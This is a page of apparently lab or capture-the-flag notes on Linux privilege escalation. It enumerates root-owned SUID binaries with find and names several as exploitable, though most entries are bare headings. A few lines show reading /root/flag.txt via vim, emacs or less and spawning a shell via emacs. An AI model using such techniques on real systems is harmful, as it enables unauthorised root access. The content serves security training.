search

Linux Privesc Playground

All the files with SUID bit set that belong to root:

-bash-4.2$ find / -user root -perm /4000 2>/dev/null
/usr/sbin/arp
/usr/sbin/node
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/wget
/usr/bin/cut
/usr/bin/base64
/usr/bin/traceroute6.iputils
/usr/bin/tail
/usr/bin/aria2c
/usr/bin/ul
/usr/bin/shuf
/usr/bin/php5
/usr/bin/gpasswd
/usr/bin/make
/usr/bin/openssl
/usr/bin/file
/usr/bin/tclsh8.5
/usr/bin/env
/usr/bin/diff
/usr/bin/watch
/usr/bin/strace
/usr/bin/rlwrap
/usr/bin/expand
/usr/bin/fold
/usr/bin/vim.basic
/usr/bin/timeout
/usr/bin/xargs
/usr/bin/expect
/usr/bin/chsh
/usr/bin/jq
/usr/bin/perl5.14.2
/usr/bin/readelf
/usr/bin/sudo
/usr/bin/ionice
/usr/bin/sudoedit
/usr/bin/unshare
/usr/bin/time
/usr/bin/taskset
/usr/bin/mtr
/usr/bin/emacs23-x
/usr/bin/flock
/usr/bin/tee
/usr/bin/xxd
/usr/bin/setarch
/usr/bin/python2.7
/usr/bin/uniq
/usr/bin/head
/usr/bin/sort
/usr/bin/newgrp
/usr/bin/stdbuf
/usr/bin/nl
/usr/bin/perl
/usr/bin/tftp
/usr/bin/find
/usr/bin/passwd
/usr/bin/rsync
/usr/bin/docker
/usr/bin/pg
/usr/bin/fmt
/usr/bin/nice
/usr/bin/od
/usr/bin/chfn
/usr/bin/gimp-2.6
/usr/bin/gdb
/usr/bin/unexpand
/sbin/dmsetup
/sbin/start-stop-daemon
/sbin/logsave
/bin/sed
/bin/mount
/bin/mv
/bin/cp
/bin/dash
/bin/ksh93
/bin/chmod
/bin/ping
/bin/chown
/bin/fusermount
/bin/bash
/bin/nano
/bin/ip
/bin/more
/bin/cat
/bin/zsh4
/bin/less
/bin/su
/bin/busybox
/bin/dd
/bin/grep
/bin/run-parts
/bin/ping6
/bin/date
/bin/bsd-csh
/bin/umount

All the binaries that can be exploited in the list above:

hashtag
arp

hashtag
cut

hashtag
base64

hashtag
tail

hashtag
ul

hashtag
shuf

hashtag
php

hashtag
openssl

hashtag
file

hashtag
tclsh

hashtag
env

hashtag
diff

hashtag
strace

hashtag
rlwrap

hashtag
expand

hashtag
fold

hashtag
vim

vim /root/flag.txt

getting a shell

hashtag
xargs

getting a shell

hashtag
timeout

hashtag
expect

hashtag
jq

hashtag
readelf

hashtag
ionice

hashtag
time

hashtag
unshare

hashtag
taskset

hashtag
emacs

emacs /root/flag.txt

getting a shell

emacs -Q -nw --eval '(term "/bin/sh")'

hashtag
flock

hashtag
xxd

hashtag
setarch

hashtag
python

getting shell

hashtag
uniq

hashtag
sort

hashtag
head

hashtag
stdbuf

hashtag
nl

hashtag
find

getting shell

hashtag
rsync

hashtag
pg

getting shell

hashtag
fmt

hashtag
nice

hashtag
od

hashtag
gdb

hashtag
unexpand

hashtag
start-stop-daemon

hashtag
sed

getting shell

hashtag
logsave

hashtag
dash

hashtag
cp

hashtag
ksh

getting shell

hashtag
bash

hashtag
more

hashtag
ip

hashtag
cat

hashtag
zsh

hashtag
less

less /root/flag.txt

hashtag
dd

hashtag
grep

hashtag
run-parts

hashtag
date

PreviousWebAppSec 101NextIntro to x86-64

Last updated